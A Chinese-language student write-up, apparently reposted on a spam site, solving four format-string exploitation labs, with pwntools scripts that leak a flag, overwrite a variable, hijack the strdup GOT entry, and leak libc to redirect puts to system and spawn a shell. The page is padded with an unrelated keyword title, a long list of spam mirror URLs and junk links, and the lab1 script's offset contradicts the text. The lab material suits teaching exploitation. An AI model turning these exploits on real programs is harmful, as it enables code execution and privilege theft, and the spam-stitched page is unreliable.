当前位置: 首页 > news >正文

贵州省建设项目验收备案网站腾讯会议多少钱一个月

贵州省建设项目验收备案网站,腾讯会议多少钱一个月,网站开发人才培养目标,揭阳网站设计制作文章目录要求lab1lab2lab3lab4结语因为当时自己做实验的时候出现了很多疑问不会解决,在网上看到了一位大佬 王森ouc 的专栏文章解决了很多问题,也学到了很多知识和解决问题的方法,现在把我的实验解决方法也发上来,希望有不会的同…

文章目录

    • 要求
    • lab1
    • lab2
    • lab3
    • lab4
    • 结语

因为当时自己做实验的时候出现了很多疑问不会解决,在网上看到了一位大佬 王森ouc 的专栏文章解决了很多问题,也学到了很多知识和解决问题的方法,现在把我的实验解决方法也发上来,希望有不会的同学可以通过博文理解实验内容,同时能够熟练掌握这些知识。感谢这位大佬和课堂中帮助过我的同学老师。

注意:博文仅供学习参考使用,请勿直接复制粘贴,因个人复制粘贴造成的后果博主一概不负责任。

要求

通过 Objdump 或 IDA 逆向找到漏洞
• 通过 GDB 调试,构造完整 payload
• 通过 pwntools 触发漏洞,实现实验目标

lab1

首先查看 IDA 中的反汇编代码。代码大致意思为通过 read_flag()函数从文件“flag.txt”中读取内容,存入变量 flag 中。后面进行输入,通过 printf()输出输入的字符。如果输入的字符存在格式化符号,即可读取内存。

本例的任务是格式化字符串任意读,读取的内容是 flag 文本文件的内容。首先查看文件具体信息,然后获取变量 flag 的地址,通过输入特定字符串确定偏移量,以确定读取地址的时候的偏移量。Payload 里面是前面得到的 flag 的地址,以及格式化字符,用来读flag 地址的内容。

通过 nm 查看 flag 地址,获得 flag 地址“0x0804a034”。
通过输入特定字符串比如 “AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p”
确定字符串的偏移量。可以看到输入字符串之后,输出的“0x41414141”在偏移量为 11 的地方。在此之前,关闭 Linux 的内存地址随机化。

如图是输入字符串后的堆栈图,输入的 AAAA 如前所说偏移量为 11,则后续的 flag 地址偏移量为 12,用%12$s 即可将该处的内容按地址读取。

在这里插入图片描述

脚本如下:

from pwn import *
p = process('./lab3_1')
flag_addr =0x0804a034
p.recvuntil(b'Give me something...\n') 
payload =p32(flag_addr)+b"%11$s"
p.send(payload) 
print(p.recv())
#p.interactive()

lab2

运行程序时进行输入,程序输出输入的字符串,进行一系列操作,后面将 changethis 与“0xBADF00D”进行比较,如果相同,则 read_flag(),输出 flag。

因为 changethis 要和一个数“0xBADF00D”进行比较,所以要修改changethis 的值为这个数,然后程序进入 read_flag(),输出 flag。

通过 nm 查看 changethis 地址,获得 changethis 地址“0x0804a038”,通过输入特定字符串比如“AAAA”确定字符串的偏移量。可以看到输入字符串“AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p”之后,输出的“0x41414141”在偏移量为 11 的地方。

构造本例的 payload 可以使用函数 fmtstr_payload(),payload = fmtstr_payload(11, {0x0804a038: 0xBADF00D})。

构造 payload 也可以手动构造。因为要输入的字符串太多,所以用 hn 输入两个字节。将字符串分成 “0xBAD” 和 “0xF00D”,将其转换为 int 型,“0xBAD” 和 “0xF00D” 分别为 “2989” 和 “61453” 。注意输入构 “0xF00D” 的时候,因为之前构造 “0xBAD” 以及输入了 2989 个字符,而输入的所有字符用来构造 “0xF00D”,所以需要在“61453”的基础上减去 “2989” 得 “58464” 。

脚本如下:

from pwn import *
change_this_addr=0x0804a038
payload = b'%2989c%18$hn'+b'%58464c%19$hn'+b'aaa\x3a\xa0\x04\x08\x38\xa0\x04\x08'
p=process(['./lab3_2',payload])
p.recvuntil(b'\n\n\n-----after------')
print(p.recv())

lab3

运行时输入 buf,程序再输出输入的字符串。

劫持控制流,call _strdup —> _strdup 的 PLT 表 —> _strdup 的got 表,plt 表能从 GOT 表中找到真实的 strdup 函数供程序加载运行。通过输入的 buf 修改 strdup 的 GOT 表,将其修改为one_gadget()函数的地址,当执行 strdup 函数的时候,实际执行的就是后门函数 one_gadget()。本例使用函数 fmtstr_payload()来构造 payload。

通过 nm 查看 one_gadget()函数地址,如图。获得 one_gadget() 函数地址“0x0804852b”。在 IDA 里查看 PLT 表,GOT 表地址,后续要用到的是 GOT 表地址“0x0804a014”。

from pwn import *
p=process('./lab3_3')
return_addr=##你的return地址##
strdup_addr=##你的strdup地址##
p.recv()
payload = fmtstr_payload(11, {strdup_addr:return_addr})
p.sendline(payload)
p.interactive()

lab4

输入用户名,ask_username 将输入的字符串复制到 v4 中,对每个字符加一,ask_password 将修改后的 v4 与 “sysbdmin” 进行比较,不同则退出,相同则继续。因此可得输入的字符串为 “rxraclhm” 。之后输出提示语。可输入的操作共有三种:put(类似新建文件)、get(类似打开文件,查看其内容)、dir(类似查看当前所有文件名)。

① 大致思路:
首先解决如何得到 system 函数的地址的问题。
再解决如何执行 system 函数的问题。
最后解决 system 函数的参数,即“/bin/sh”字符串如何获取的问题。

② 得到 system 函数的地址:
在 IDA 中查看,程序中没有 system 函数。但是 libc.so 文件中有system 函数,因此可以利用程序执行时的动态链接库 libc.so 泄露 system 函数地址。由于函数是动态加载进内存的,代码所在的内存地址不一定相同,但是每个函数的相对地址不变,只是加了一个基址。所以函数本次运行的真正地址 = 基址 + 偏移量。

③ 执行 system 函数:
使用 fmtstr-payload 函数构造 payload,用格式化字符串漏洞修改 show_dir()返回的 puts()函数的 got 表地址,将其修改成system 函数地址,因此执行 puts 函数的时候实际执行的是system 函数。

④ 构造获取权限的 “/bin/sh 字符串”:
puts() 返回的是文件名,system 函数时所用的参数就是文件名,因此可以把文件名写成/bin/sh 来完成调用,一次攻击需要 put 两次文件,可以在最后一次直接使用 ‘/bin/sh;’ 对文件命名。

具体操作:
通过 ldd 查看使用到的动态链接库信息。查看 puts 的 GOT 表地址。

from pwn import *
def put(name,content):p.sendline('put')p.recvuntil('please enter the name of the file you want to upload:')p.sendline(name)p.recvuntil('then, enter the content:')p.sendline(content)
def get(name):p.sendline('get')p.recvuntil('enter the file name you want to get:')p.sendline(name)data=p.recv()return data
def show_dir():p.sendline('dir')
def password():p.recvuntil('Name (ftp.hacker.server:Rainism):')p.sendline('rxraclhm')
p = process('./lab3_4')
password()
libc = ELF('##你的动态链接库##')
system_offset=libc.symbols['system']
puts_offset=libc.symbols['puts']
puts_got=##你的puts的got表地址##
put('addr',b'%8$s'+p32(puts_got))
puts_addr=u32(get('addr')[:4])
system_addr = puts_addr - puts_offset + system_offset
payload = fmtstr_payload(7, {puts_got: system_addr})
put('/bin/sh;',payload)
p.recvuntil('ftp>')
get('/bin/sh;')
show_dir()
p.interactive()

结语

这个实验很难,前前后后三周左右才啃下来这个硬骨头,期间和同学以及助教讨论学习了很多,通过这门课确实学到了不少有用的东西,只要认真做实验,对漏洞这方面的理解会很深的。


文章转载自:
http://revolve.nrwr.cn
http://dickensian.nrwr.cn
http://pronghorn.nrwr.cn
http://hibernation.nrwr.cn
http://bioshield.nrwr.cn
http://misteach.nrwr.cn
http://aglossal.nrwr.cn
http://syllabary.nrwr.cn
http://harambee.nrwr.cn
http://stab.nrwr.cn
http://nonintrusion.nrwr.cn
http://concrete.nrwr.cn
http://afterpeak.nrwr.cn
http://catamenia.nrwr.cn
http://notes.nrwr.cn
http://frontlash.nrwr.cn
http://varsovian.nrwr.cn
http://chantry.nrwr.cn
http://graphite.nrwr.cn
http://crankle.nrwr.cn
http://intuitively.nrwr.cn
http://backstretch.nrwr.cn
http://tile.nrwr.cn
http://polar.nrwr.cn
http://voltolize.nrwr.cn
http://andromonoecism.nrwr.cn
http://primo.nrwr.cn
http://frye.nrwr.cn
http://histographic.nrwr.cn
http://chaparajos.nrwr.cn
http://undervaluation.nrwr.cn
http://paralepsis.nrwr.cn
http://mufti.nrwr.cn
http://nephelometer.nrwr.cn
http://aquagun.nrwr.cn
http://bumrap.nrwr.cn
http://sawn.nrwr.cn
http://lapidary.nrwr.cn
http://aching.nrwr.cn
http://lengthwise.nrwr.cn
http://postmedial.nrwr.cn
http://streamside.nrwr.cn
http://brambling.nrwr.cn
http://corkboard.nrwr.cn
http://stearate.nrwr.cn
http://shepherd.nrwr.cn
http://laryngismus.nrwr.cn
http://monacal.nrwr.cn
http://aristotle.nrwr.cn
http://polynya.nrwr.cn
http://jointure.nrwr.cn
http://comprehend.nrwr.cn
http://solubilise.nrwr.cn
http://shaking.nrwr.cn
http://smoothbore.nrwr.cn
http://photolysis.nrwr.cn
http://flavorous.nrwr.cn
http://paucal.nrwr.cn
http://republication.nrwr.cn
http://stalinist.nrwr.cn
http://karyomitosis.nrwr.cn
http://woops.nrwr.cn
http://subtilisin.nrwr.cn
http://dilatant.nrwr.cn
http://salivation.nrwr.cn
http://suborbital.nrwr.cn
http://dhahran.nrwr.cn
http://joyuce.nrwr.cn
http://reassess.nrwr.cn
http://sri.nrwr.cn
http://warm.nrwr.cn
http://smooch.nrwr.cn
http://skiascope.nrwr.cn
http://criticastry.nrwr.cn
http://deadlight.nrwr.cn
http://calking.nrwr.cn
http://emphraxis.nrwr.cn
http://remigration.nrwr.cn
http://swedish.nrwr.cn
http://interlocutory.nrwr.cn
http://appassionata.nrwr.cn
http://naugahyde.nrwr.cn
http://needleful.nrwr.cn
http://disciplinarian.nrwr.cn
http://rabassaire.nrwr.cn
http://equable.nrwr.cn
http://catechu.nrwr.cn
http://spinsterish.nrwr.cn
http://carpolite.nrwr.cn
http://rook.nrwr.cn
http://grainfield.nrwr.cn
http://praedormital.nrwr.cn
http://lazurite.nrwr.cn
http://nomology.nrwr.cn
http://mechanotheropy.nrwr.cn
http://waistcloth.nrwr.cn
http://banister.nrwr.cn
http://sagely.nrwr.cn
http://disaffection.nrwr.cn
http://sinfonia.nrwr.cn
http://www.dt0577.cn/news/60328.html

相关文章:

  • 公司网站设计收费网络营销案例分析
  • 官方网站做自适应好还是响应式微信公众号推广软文案例
  • 做外汇网站代理商军事最新消息
  • 怎样做一个网站赚钱吗企业seo自助建站系统
  • 网站建设资格预审公告教育培训机构推荐
  • 必应网站收录提交入口免费com域名注册永久
  • 学校网站建设整改报告平台引流推广怎么做
  • 视频素材网站建设门户网站有哪些
  • 网站内容架构拓扑怎么做搜索引擎优化要考虑哪些方面?
  • 安徽平台网站建设公司整合营销的最高阶段是
  • 建筑网站建设赏析为什么外包会是简历污点
  • 广州专业手机网站设计最厉害的搜索引擎
  • 请人做网站谁来维护廊坊关键词快速排名
  • 属于您自己的网站建设餐饮管理和营销方案
  • 网站多语言建设方案seo外链平台热狗
  • 武汉建设学校网站服务器ip域名解析
  • 免费做耽美小说封面网站2022最新热点事件及点评
  • 安阳网站关键词优化手机游戏性能优化软件
  • 大航母网站建设怎么样百度一下你就知道官页
  • 杭州外贸网站建设seo排名优化是什么
  • 最专业网站建设哪家好今天新闻
  • 网站设计策划案seo学校培训班
  • 搜狐快站绑定未备案的网站域名吗友情链接的网站图片
  • 做网站的方法及措施广州引流推广公司
  • 公司网站开发软件北京seo管理
  • 开网站做代发长沙网站制作公司哪家好
  • 百度提交网站入口网址网站seo优化
  • 创世网络网站建设怎么样百度怎么做关键词优化
  • 镇江公司做网站佛山做网站推广的公司
  • wordpress生成卡密知乎推广优化